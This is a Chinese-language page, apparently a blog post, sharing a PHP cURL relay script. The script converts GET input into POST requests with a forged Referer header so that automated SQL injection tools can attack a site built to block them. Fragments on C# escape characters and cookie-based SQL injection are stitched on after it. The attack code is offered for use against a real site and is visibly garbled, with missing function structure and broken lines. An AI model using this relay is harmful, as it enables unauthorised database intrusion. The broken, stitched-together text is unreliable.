最近碰到乙個站,只能post資料,不能用get,而且加了referer限制,所以一般的注入工個無法使用,當然cookie也不行。難道說要手工注入,那不累死才怪,突然想起php有curl可以post資料,於是網上找來**,修改一下,如下:
<?php
set_time_limit(0);
$id=$_get["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3d",$id);
function curlrequest($url,$postfield,$proxy="")
curl_setopt($ch, curlopt_url, $url); //設定請求的url
curl_setopt($ch, curlopt_returntransfer,1);// 設為true把curl_exec()結果轉化為字串,而不是直接輸出
curl_setopt($ch, curlopt_post, 1);//啟用post提交
curl_setopt($ch, curlopt_postfields, $postfield); //設定post提交的字串
curl_setopt($ch, curlopt_timeout, 25); // 超時時間
curl_setopt($ch, curlopt_useragent, $user_agent);//http請求user-agent:頭
'referer: [url]' //定義referer,抓包就可以看到了
));//設定http頭資訊
$document = curl_exec($ch); //執行預定義的curl
$info=curl_getinfo($ch); //得到返回資訊的特性
if($info[http_code]=="405")\n"; //**出錯
exit; }
return $document; }
$url="";
$postfield="no=".$id;//引數
$proxy = '';
$str=curlrequest($url,$postfield,$proxy);
echo $str;
?>
儲存為cc.php 把它放到乙個支援curl的php空間,
再用工具注入[url]
ok!
C 中轉義字元
c 中轉義字元分2中,一種是 一種是 轉義字元 字元名稱 單引號 雙引號 反斜槓 0 空字元 a 警報符 b 退格 f 換頁 n 換行 r 回車 t 水平製表 v 垂直製表 verbatim字串 對於verbatim字串,編譯 器會嚴格按照原樣對其進行解釋。也就是說,即使這個字串跨越多行,或是包含轉...
cookie中轉sql攻擊
最近帶了個實習生做了個sql注入練習,她找到了個asp 的cooki注入漏洞,這個也是目前sql注入比較多見的地方,因為大部分 在得到request的時候採用的都是request xx 這個方法實際上是把request中的get,post,cookie挨個遍歷查詢了下,目前大部分sql注入防禦軟體都...
C 中轉義字元
c 中轉義字元 c 中轉義字元分2中,一種是 一種是 符號在c 中有兩個作用 作用1 在字串的前面加 表示取消字串中的轉義 例如 string path d root subdir 作用2 如果使用者定義的物件名和系統關鍵字衝突,可以在變數前面加入 例如 string class this is a...